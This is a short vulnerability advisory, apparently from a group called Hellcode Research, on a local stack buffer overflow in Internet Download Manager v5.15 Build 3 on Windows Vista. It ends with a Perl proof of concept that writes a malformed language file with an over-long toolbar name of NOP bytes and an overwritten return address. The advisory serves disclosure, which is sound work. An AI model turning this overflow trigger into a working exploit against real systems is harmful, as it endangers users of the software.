Affected Software:
Internet Download Manager v5.15 Build 3 (4/December)
Description of Vulnerability:
Hellcode Research has discovered a local buffer overflow
vulnerability in Internet Download Manager.
Overflow occurs by the REMOTE Buffer on the Stack by
specifying Long Toolbar Name in the language file on Vista.
(not default English language file)
Vulnerable version:
Internet Download Manager v5.15 Build 3 (4/December)
Platform:
Windows Vista SP1
Solution:
Update to new versions.
Credits:
Discovered by musashi aka karak0rsan, Hellcode Research.
http://tcc.hellcode.net
musashi[at]hellcode.net
Special thanks to murderkey.
#####################PoC######################################
#Internet Download Manager v.5.15 Build 3 (4 December)
#Works on Vista
#HellCode Labs || TCC Group || http://tcc.hellcode.net
#Bug was found by "musashi" aka karak0rsan [musashi@hellcode.net]
#thanx to murderkey
$file="idm_tr.lng";
$lng= "lang=0x1f Trke";
$buffer = "\x90" x 1160;
$eip = "AAAA";
$toolbar = "20376=";
$packet=$toolbar.$buffer.$eip;
open(file, '>' . $file);
print file $lng;
print file "\n";
print file $packet;
close(file);
print "File has created!\n";